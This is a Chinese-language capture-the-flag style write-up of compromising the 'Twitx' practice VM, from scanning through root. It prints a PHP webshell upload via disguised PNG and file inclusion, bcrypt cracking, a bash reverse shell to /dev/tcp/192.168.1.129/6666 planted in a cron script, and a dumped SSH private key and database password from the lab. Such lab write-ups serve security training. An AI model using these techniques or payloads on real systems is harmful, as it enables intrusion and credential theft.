# 靶场搭建
下载:Twitx
Nat,IP: 192.168.1.128
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 bc:cd:ce:6e:98:09:e5:60:d2:f3:96:74:eb:3f:cc:e3 (ECDSA) | |
|_ 256 b0:38:0c:1c:76:d0:de:64:0a:c4:07:89:4b:71:69:86 (ED25519) | |
80/tcp open http Apache httpd 2.4.59 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.59 (Debian) |
http://192.168.1.128/info.php | |
http://192.168.1.128/note |
Recuerda contratar certificado del dominio twitx.nyx para el lanzamiento. | |
记得为 twitx.nyx 的发布购买域名证书。 |
添加域名到 host
┌──(root㉿kali)-[~/Desktop] | |
└─# gobuster dir -u http://twitx.nyx/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -t 100 | |
=============================================================== | |
Gobuster v3.6 | |
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
=============================================================== | |
[+] Url: http://twitx.nyx/ | |
[+] Method: GET | |
[+] Threads: 100 | |
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt | |
[+] Negative Status codes: 404 | |
[+] User Agent: gobuster/3.6 | |
[+] Extensions: php,txt,html | |
[+] Timeout: 10s | |
=============================================================== | |
Starting gobuster in directory enumeration mode | |
=============================================================== | |
/.php (Status: 403) [Size: 274] | |
/index.php (Status: 200) [Size: 33241] | |
/user (Status: 301) [Size: 305] [--> http://twitx.nyx/user/] | |
/.html (Status: 403) [Size: 274] | |
/assets (Status: 301) [Size: 307] [--> http://twitx.nyx/assets/] | |
/upload (Status: 301) [Size: 307] [--> http://twitx.nyx/upload/] | |
/css (Status: 301) [Size: 304] [--> http://twitx.nyx/css/] | |
/includes (Status: 301) [Size: 309] [--> http://twitx.nyx/includes/] | |
/js (Status: 301) [Size: 303] [--> http://twitx.nyx/js/] | |
/private.php (Status: 302) [Size: 0] [--> /?error=Zona+privada#registrate] | |
/javascript (Status: 301) [Size: 311] [--> http://twitx.nyx/javascript/] | |
/.php (Status: 403) [Size: 274] | |
/.html (Status: 403) [Size: 274] | |
/server-status (Status: 403) [Size: 274] | |
Progress: 882240 / 882244 (100.00%) | |
=============================================================== | |
Finished | |
=============================================================== |
进入 http://twitx.nyx/private.php
,是个注册表单,有个文件上传。
查看源代码发现第 527 行有提示,URL 解码后如下
<form method="post" action="?i"> | |
<div class="mb-4 row"> | |
<div class="form-floating mb-3"> | |
<input class="form-control" id="email" type="email" name="email" | |
required="required" /> | |
<label for="email">Email </label> | |
</div> | |
<!-- Password number input--> | |
<div class="form-floating mb-3"> | |
<input class="form-control" id="password" type="password" name="password" | |
required="required" /> | |
<label for="password">Contrase�a</label> | |
</div> | |
</div> | |
<button class="btn btn-secondary me-5"> | |
<i class="fa-solid fa-right-to-bracket me-2"></i>Log-in | |
</button> | |
<button class="btn btn-primary" type="button" data-bs-dismiss="modal"> | |
<i class="fas fa-xmark fa-fw"></i> | |
Cerrar | |
</button> | |
</form> |
发现了登录表单,我们先注册一个账号,然后直接发送一下登录请求
┌──(root㉿kali)-[~] | |
└─# curl -i -X POST --data 'email=123%40123.com&password=12345678' 'http://twitx.nyx/?i' | |
HTTP/1.1 302 Found | |
Date: Fri, 07 Jun 2024 21:42:49 GMT | |
Server: Apache/2.4.59 (Debian) | |
Set-Cookie: PHPSESSID=cncdd6f7nb5efvcqlfipknm9bd; path=/ | |
Expires: Thu, 19 Nov 1981 08:52:00 GMT | |
Cache-Control: no-store, no-cache, must-revalidate | |
Pragma: no-cache | |
Location: ?success=Usuario+validado+correctamente.#registrate | |
Set-Cookie: PHPSESSID=cei810vp09qe21mes697253uum; path=/ | |
Content-Length: 0 | |
Content-Type: text/html; charset=UTF-8 |
达到登录后的地址和 PHPSESSID,我们直接改一手,然后刷新一下发现登录成功
看到前面上传的图片地址了,但是前面只能上传 png 图片
注册的时候上传,登陆过去查看地址,直接访问是不能解析的,但是观察到 profile 页面和前面扫描的目录,可以发现是有 user 目录的
访问一下 http://twitx.nyx/user/profile.php
发现确实如此,那么我们可以拼接一下,把图片包含进来
注册的时候,上传一个 png 后缀的 php 马。通过前面的 curl
获取登录后的 sessionID,前端修改后进入 profile,查看 png 的路径
组合一下,访问触发: http://twitx.nyx/private.php?folder=upload&file=152124645266638af1e4b0d9.39084780.png
拿到 shell
# 提权
网站目录下 /var/www/twitx.nyx/includes/config.php
中存了账户信息
$dbHost = 'localhost'; | |
$dbUser = 'twitxdbusr'; | |
$dbPassword = '3GcxHeSqbgf1kfj'; | |
$dbDatabase = 'twitxdb'; |
进数据库看看
www-data@twitx:/var/www/twitx.nyx/includes$ mysql -u twitxdbusr -p | |
Enter password: | |
Welcome to the MariaDB monitor. Commands end with ; or \g. | |
Your MariaDB connection id is 39 | |
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12 | |
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. | |
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | |
MariaDB [(none)]> show databases; | |
+--------------------+ | |
| Database | | |
+--------------------+ | |
| information_schema | | |
| twitxdb | | |
+--------------------+ | |
2 rows in set (0.001 sec) | |
MariaDB [(none)]> use twitxdb; | |
Reading table information for completion of table and column names | |
You can turn off this feature to get a quicker startup with -A | |
Database changed | |
MariaDB [twitxdb]> show tables; | |
+-------------------+ | |
| Tables_in_twitxdb | | |
+-------------------+ | |
| users | | |
+-------------------+ | |
1 row in set (0.000 sec) | |
MariaDB [twitxdb]> select * from users; | |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+ | |
| id | nombre | email | password | avatar | role | | |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+ | |
| 1 | Lenam | [email protected] | $2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm | | adm | | |
| 2 | 123 | 123@123.com | $2y$10$nM/m5idaaJoGXk.12HhFDeQdu2fYbMNaN9sFyCWAyycFIzX7RA1ne | 30710014266637852db6459.26073065.png | usr | | |
| 3 | 2222 | 2222@222.com | $2y$10$1mO34Ve6b76E2Biqalg/..cwfTKn.8cHuMywnKcxpw5E2oiKNzkGS | 1320458475666380f4701ff3.05570504.png | usr | | |
| 4 | 111 | 111@111.com | $2y$10$kH5/MHOtMH25pgXZU6QvoOBJBuNJe0iC7AEEE7fFHix9KidQXAtNe | 16238279576663888a01e193.62033086.png | usr | | |
| 5 | 1111 | 1111@1111.com | $2y$10$hFHKmlMguBsQUDhiHL9/Y.7PYbdgoOHkeAql98mCfo.IQlLcS.ZEC | 152124645266638af1e4b0d9.39084780.png | usr | | |
| 6 | 666 | 666@666.com | $2y$10$KNh0gBRRw7MDLPNliUxmoupnwka8pWmUmZNFf4MSw6uXgySGBt8Ti | 128460101166638d442c1e62.12431542.png | usr | | |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+ | |
6 rows in set (0.000 sec) |
解一下第一条密码
先去:hashes.com,查一下加密算法,是 bcrypt
┌──(root㉿kali)-[~] | |
└─# echo '$2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm' > hash | |
┌──(root㉿kali)-[~] | |
└─# john hash --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) | |
Cost 1 (iteration count) is 1024 for all loaded hashes | |
Will run 4 OpenMP threads | |
Proceeding with wordlist:/usr/share/john/password.lst | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
patricia (?) | |
1g 0:00:00:10 DONE (2024-06-07 11:06) 0.09842g/s 99.21p/s 99.21c/s 99.21C/s molly1..petey | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
得到了密码: patricia
su 不过去只能想其他办法了
上传 pspy 监听,发现有计划任务, /var/www/twitx.nyx/includes/taak.php
。写反弹 shell 进去: system("bash -c'bash-i >&/dev/tcp/192.168.1.129/6666 0>&1'");
拿到 timer
的 shell
timer@twitx:~$ sudo ascii85 "/home/lenam/.ssh/id_rsa" | ascii85 --decode | |
-----BEGIN OPENSSH PRIVATE KEY----- | |
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 | |
4lWiSQ== | |
-----END OPENSSH PRIVATE KEY----- |
拿到 lenam 的 ssh 私钥,ssh 登录上去,passphrase 是前面得到的 patricia
看到用户目录里面有个 look\inside
文件夹,里面有个可执行文件 unshare
运行一下 ./unshare -h
发现好像能提供一个 uid,然后使用这个 uid 进入目录
果断改成 0: ./unshare -S 0
拿到了 root shell